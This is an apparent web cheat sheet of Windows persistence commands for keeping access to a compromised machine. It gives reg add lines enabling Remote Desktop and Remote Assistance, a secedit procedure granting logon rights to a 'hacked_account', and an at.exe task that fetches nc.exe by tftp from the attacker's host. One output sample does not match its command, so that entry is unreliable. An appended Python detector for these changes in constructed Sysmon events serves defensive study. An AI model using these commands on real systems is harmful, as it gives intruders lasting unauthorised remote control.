
Windows General Persistence Commands

Commands used to maintain persistence on a system after it has been compromised. They are usually executed from a cmd.exe or command.com prompt.

Remote Assistance Enable

  • Command with arguments: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
  • Description: Must be run as an administrator. Enables Remote Assistance by adding a registry value on the local system.
  • Output (Windows 2008):

      C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

      The operation completed successfully.

Remote Desktop Enable - Method 1

  • Command with arguments: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • Description: Must be run as an administrator. Enables Remote Desktop by adding a registry value on the local system.
  • Output (Windows 2008):

      C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

      The operation completed successfully.

Remote Desktop Enable - Method 2

Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' BlackHat 2008 presentation (page 53), you can remotely enable remote desktop using the commands below.

  1. On the compromised system, create a file named fix_ts_policy.ini containing the contents below. Change the "hacked_account" value to the account you have compromised on the remote system.

     [Unicode]
     Unicode=yes
     [Version]
     signature="$CHICAGO$"
     Revision=1
     [Privilege Rights]
     seremoteinteractivelogonright = hacked_account
     seinteractivelogonright = hacked_account
     sedenyinteractivelogonright =
     sedenyremoteinteractivelogonright =
     sedenynetworklogonright =
    
  2. Create another file named enable_ts.reg containing the contents below.

     Windows Registry Editor Version 5.00
     [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
     "fDenyTSConnections"=dword:00000000
     "TSEnabled"=dword:00000001
     "TSUserEnabled"=dword:00000000
    
  3. On the remote system, execute the following commands:

     c:\> sc config termservice start= auto
     c:\> regedit /s enable_ts.reg
     c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
     c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
     c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
     c:\> gpupdate /Force
     c:\> net start "terminal services"

Scheduler

The Windows scheduler can be used to further compromise a system. It usually runs at the SYSTEM account privilege level. According to Val Smith's and Colin Ames' BlackHat 2008 presentation (page 58), you can remotely schedule tasks using the commands below.

c:\> net use \\[TargetIP]\ipc$ password /user:username
c:\> at \\[TargetIP] 12:00 pm command

For example, on the remote system you might run: at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe
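The registry values, service changes and at.exe scheduling described in the Remote Desktop and Scheduler sections above leave a recognisable trail in endpoint telemetry. The following is an added detection example, not part of the original page or of the cited presentation: it scans constructed Sysmon-style records (EventID 13 registry value set, EventID 1 process creation) and reports the changes this page lists. The event field names follow Sysmon's schema; the sample records themselves are made up for the example.

```python
"""Added example: flag the persistence changes listed on this page in
constructed Sysmon-style events (13 = registry value set, 1 = process)."""
import re

TS_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"
# (value name, data as Sysmon renders a DWORD) -> meaning of the change
WATCHED_VALUES = {
    ("fDenyTSConnections", "DWORD (0x00000000)"): "Remote Desktop enabled",
    ("fAllowToGetHelp", "DWORD (0x00000001)"): "Remote Assistance enabled",
    ("TSEnabled", "DWORD (0x00000001)"): "Terminal Services enabled",
}
# Command-line shapes taken from the procedures on this page.
WATCHED_COMMANDS = [
    (re.compile(r"\bsc\b.*\btermservice\b.*start=\s*auto", re.I), "TermService set to auto-start"),
    (re.compile(r"\bsecedit\b.*/configure", re.I), "security policy rewritten with secedit"),
    (re.compile(r"\bnet\s+start\s+\"?terminal services\"?", re.I), "Terminal Services started"),
    (re.compile(r"\bat\s+\\\\\S+\s+\d{1,2}:\d{2}\s*[ap]m", re.I), "remote task scheduled with at.exe"),
]

def check_event(event):
    """Return a finding for one event, or None if nothing on the page matches."""
    if event.get("EventID") == 13:
        key, _, name = event.get("TargetObject", "").rpartition("\\")
        if key.lower() != TS_KEY.lower():
            return None
        for (value, data), meaning in WATCHED_VALUES.items():
            if name.lower() == value.lower() and event.get("Details") == data:
                return f"{meaning} via registry by {event.get('Image', '?')}"
        return None
    if event.get("EventID") == 1:
        cmd = event.get("CommandLine", "")
        for pattern, meaning in WATCHED_COMMANDS:
            if pattern.search(cmd):
                return f"{meaning}: {cmd}"
    return None

def scan(events):
    return [f for f in (check_event(e) for e in events) if f]

# Constructed sample events mirroring the commands on this page.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": TS_KEY + r"\fDenyTSConnections", "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\system32\reg.exe",
     "TargetObject": TS_KEY + r"\fAllowToGetHelp", "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\system32\svchost.exe",  # RDP being disabled: not flagged
     "TargetObject": TS_KEY + r"\fDenyTSConnections", "Details": "DWORD (0x00000001)"},
    {"EventID": 1, "CommandLine": "sc config termservice start= auto"},
    {"EventID": 1, "CommandLine": "secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini"},
    {"EventID": 1, "CommandLine": r"at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe"},
    {"EventID": 1, "CommandLine": "ping -n 1 localhost"},  # benign control
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Running it prints five findings; the two control events (RDP being disabled, a ping) produce none.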